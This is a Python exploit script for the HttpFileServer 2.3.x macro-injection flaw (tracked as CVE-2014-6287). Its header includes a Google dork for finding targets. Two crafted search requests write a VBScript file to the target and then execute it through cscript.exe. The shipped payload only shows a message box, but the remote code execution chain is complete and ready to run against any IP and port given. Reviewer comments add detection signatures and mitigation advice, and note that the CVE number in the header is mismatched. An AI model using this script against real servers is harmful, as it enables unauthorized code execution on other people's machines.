cve-2014-6287.py
#!/usr/bin/python
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 04-01-2016
# Remote: Yes
# Exploit Author: Avinash Kumar Thapa aka "-Acid"
# Comment: Modified by Fabian Martinez Portantier
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
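# CVE : CVE-2014-7226
# NOTE(review): this file is published as cve-2014-6287.py, so the CVE id above and the
# file name disagree. The requests below inject a macro through `?search=%00`, which is
# the issue usually tracked as CVE-2014-6287. Confirm the id before citing it in an
# advisory or a detection rule.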
#Usage : python Exploit.py <Target IP address> <Target Port Number>
import urllib2
import sys
# Proof-of-concept flow: two HTTP GET requests, each carrying one server-side
# macro in the `search` query parameter. Python 2 only (urllib2).
#
# Defender notes, from what the requests below look like on the wire:
#   - Both requests hit `/?search=` with an encoded NUL (`%00`) immediately
#     followed by the macro opener `{.`; that pair in a query string is a
#     high-signal pattern for web-server, proxy and IDS logs.
#   - The macro names are sent in clear text (`save|` and `exec|`), so they can
#     also be matched in request logs.
#   - The second macro names cscript.exe; presumably it is started by the file
#     server process, so a process-creation alert on that parent/child pair is
#     a useful host-side check. Verify against the host telemetry in use.
#   - Mitigation is on the server side: run a vendor release that fixes the
#     macro handling and keep the service off untrusted networks.

# Location on the target's disk that the first macro is asked to write to.
file_path = 'C:\Users\Public\script.vbs'
# Benign marker payload: a one-line VBScript that only shows a message box.
file_code = 'MsgBox("Hacked")'
# Target address and port come straight from the command line; no validation
# is performed, and a missing argument raises IndexError.
ip = sys.argv[1]
port = sys.argv[2]
# First macro: `save|<path>|<content>`, with the content URL-quoted.
step1 = 'save|' + file_path + '|' + urllib2.quote(file_code)
# Second macro: `exec|cscript.exe <path>` (the space is pre-encoded as %20).
step2 = 'exec|cscript.exe%20' + urllib2.quote(file_path)
# Order matters: the file is written first, then executed. Both calls use no
# timeout and discard the response, so the script never confirms whether
# either step took effect.
urllib2.urlopen("http://"+ip+":"+port+"/?search=%00{.+"+step1+".}")
urllib2.urlopen("http://"+ip+":"+port+"/?search=%00{.+"+step2+".}")